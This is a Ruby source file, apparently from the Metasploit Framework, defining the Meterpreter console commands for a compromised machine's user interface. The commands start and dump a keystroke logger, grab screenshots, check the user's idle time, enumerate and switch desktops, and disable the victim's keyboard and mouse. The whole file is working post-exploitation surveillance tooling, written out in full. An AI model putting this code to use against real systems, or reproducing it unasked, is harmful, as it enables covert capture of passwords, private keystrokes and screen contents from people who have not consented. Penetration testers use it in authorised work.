# -*- coding: binary -*- require 'rex/post/meterpreter' module Rex module Post module Meterpreter module Ui ### # # The user interface portion of the standard API extension. # ### class Console::CommandDispatcher::Stdapi::Ui Klass = Console::CommandDispatcher::Stdapi::Ui include Console::CommandDispatcher # # List of supported commands. # def commands all = { "enumdesktops" => "List all accessible desktops and window stations", "getdesktop" => "Get the current meterpreter desktop", "idletime" => "Returns the number of seconds the remote user has been idle", "keyscan_dump" => "Dump the keystroke buffer", "keyscan_start" => "Start capturing keystrokes", "keyscan_stop" => "Stop capturing keystrokes", "screenshot" => "Grab a screenshot of the interactive desktop", "setdesktop" => "Change the meterpreters current desktop", "uictl" => "Control some of the user interface components" # not working yet # "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)", } reqs = { "enumdesktops" => [ "stdapi_ui_desktop_enum" ], "getdesktop" => [ "stdapi_ui_desktop_get" ], "idletime" => [ "stdapi_ui_get_idle_time" ], "keyscan_dump" => [ "stdapi_ui_get_keys" ], "keyscan_start" => [ "stdapi_ui_start_keyscan" ], "keyscan_stop" => [ "stdapi_ui_stop_keyscan" ], "screenshot" => [ "stdapi_ui_desktop_screenshot" ], "setdesktop" => [ "stdapi_ui_desktop_set" ], "uictl" => [ "stdapi_ui_enable_mouse", "stdapi_ui_enable_keyboard" ] } all.delete_if do |cmd, desc| del = false reqs[cmd].each do |req| next if client.commands.include? req del = true break end del end all end # # Name for this dispatcher. # def name "Stdapi: User interface" end # # Executes a command with some options. # def cmd_idletime(*args) seconds = client.ui.idle_time print_line( "User has been idle for: #{Rex::ExtTime.sec_to_s(seconds)}") return true end # # Enables/disables user interface mice and keyboards on the remote machine. # def cmd_uictl(*args) if (args.length < 2) print_line( "Usage: uictl [enable/disable] [keyboard/mouse/all]") return true end case args[0] when 'enable' case args[1] when 'keyboard' print_line("Enabling keyboard...") client.ui.enable_keyboard when 'mouse' print_line("Enabling mouse...") client.ui.enable_mouse when 'all' print_line("Enabling all...") client.ui.enable_keyboard client.ui.enable_mouse else print_error("Unsupported user interface device: #{args[1]}") end when 'disable' case args[1] when 'keyboard' print_line("Disabling keyboard...") client.ui.disable_keyboard when 'mouse' print_line("Disabling mouse...") client.ui.disable_mouse when 'all' print_line("Disabling all...") client.ui.disable_keyboard client.ui.disable_mouse else print_error("Unsupported user interface device: #{args[1]}") end else print_error("Unsupported command: #{args[0]}") end return true end # # Grab a screenshot of the current interactive desktop. # def cmd_screenshot( *args ) path = Rex::Text.rand_text_alpha(8) + ".jpeg" quality = 50 view = false screenshot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner." ], "-q" => [ true, "The JPEG image quality (Default: '#{quality}')" ], "-p" => [ true, "The JPEG image path (Default: '#{path}')" ], "-v" => [ true, "Automatically view the JPEG image (Default: '#{view}')" ] ) screenshot_opts.parse( args ) { | opt, idx, val | case opt when "-h" print_line( "Usage: screenshot [options]\n" ) print_line( "Grab a screenshot of the current interactive desktop." ) print_line( screenshot_opts.usage ) return when "-q" quality = val.to_i when "-p" path = val when "-v" view = true if ( val =~ /^(t|y|1)/i ) end } data = client.ui.screenshot( quality ) if( data ) ::File.open( path, 'wb' ) do |fd| fd.write( data ) end path = ::File.expand_path( path ) print_line( "Screenshot saved to: #{path}" ) Rex::Compat.open_file( path ) if view end return true end # # Enumerate desktops # def cmd_enumdesktops(*args) print_line( "Enumerating all accessible desktops" ) desktops = client.ui.enum_desktops desktopstable = Rex::Ui::Text::Table.new( 'Header' => "Desktops", 'Indent' => 4, 'Columns' => [ "Session", "Station", "Name" ] ) desktops.each { | desktop | session = desktop['session'] == 0xFFFFFFFF ? '' : desktop['session'].to_s desktopstable << [ session, desktop['station'], desktop['name'] ] } if( desktops.length == 0 ) print_line( "No accessible desktops were found." ) else print( "\n" + desktopstable.to_s + "\n" ) end return true end # # Get the current meterpreter desktop. # def cmd_getdesktop(*args) desktop = client.ui.get_desktop session = desktop['session'] == 0xFFFFFFFF ? '' : "Session #{desktop['session'].to_s}\\" print_line( "#{session}#{desktop['station']}\\#{desktop['name']}" ) return true end # # Change the meterpreters current desktop. # def cmd_setdesktop( *args ) switch = false dsession = -1 dstation = 'WinSta0' dname = 'Default' setdesktop_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner." ], #"-s" => [ true, "The session (Default: '#{dsession}')" ], "-w" => [ true, "The window station (Default: '#{dstation}')" ], "-n" => [ true, "The desktop name (Default: '#{dname}')" ], "-i" => [ true, "Set this desktop as the interactive desktop (Default: '#{switch}')" ] ) setdesktop_opts.parse( args ) { | opt, idx, val | case opt when "-h" print_line( "Usage: setdesktop [options]\n" ) print_line( "Change the meterpreters current desktop." ) print_line( setdesktop_opts.usage ) return #when "-s" # dsession = val.to_i when "-w" dstation = val when "-n" dname = val when "-i" switch = true if ( val =~ /^(t|y|1)/i ) end } if( client.ui.set_desktop( dsession, dstation, dname, switch ) ) print_line( "#{ switch ? 'Switched' : 'Changed' } to desktop #{dstation}\\#{dname}" ) else print_line( "Failed to #{ switch ? 'switch' : 'change' } to desktop #{dstation}\\#{dname}" ) end return true end # # Unlock or lock the desktop # def cmd_unlockdesktop(*args) mode = 0 if(args.length > 0) mode = args[0].to_i end if(mode == 0) print_line("Unlocking the workstation...") client.ui.unlock_desktop(true) else print_line("Locking the workstation...") client.ui.unlock_desktop(false) end return true end # # Start the keyboard sniffer # def cmd_keyscan_start(*args) print_line("Starting the keystroke sniffer...") client.ui.keyscan_start return true end # # Stop the keyboard sniffer # def cmd_keyscan_stop(*args) print_line("Stopping the keystroke sniffer...") client.ui.keyscan_stop return true end # # Dump captured keystrokes # def cmd_keyscan_dump(*args) print_line("Dumping captured keystrokes...") data = client.ui.keyscan_dump print_line(client.ui.keyscan_extract(data)) return true end end end end end end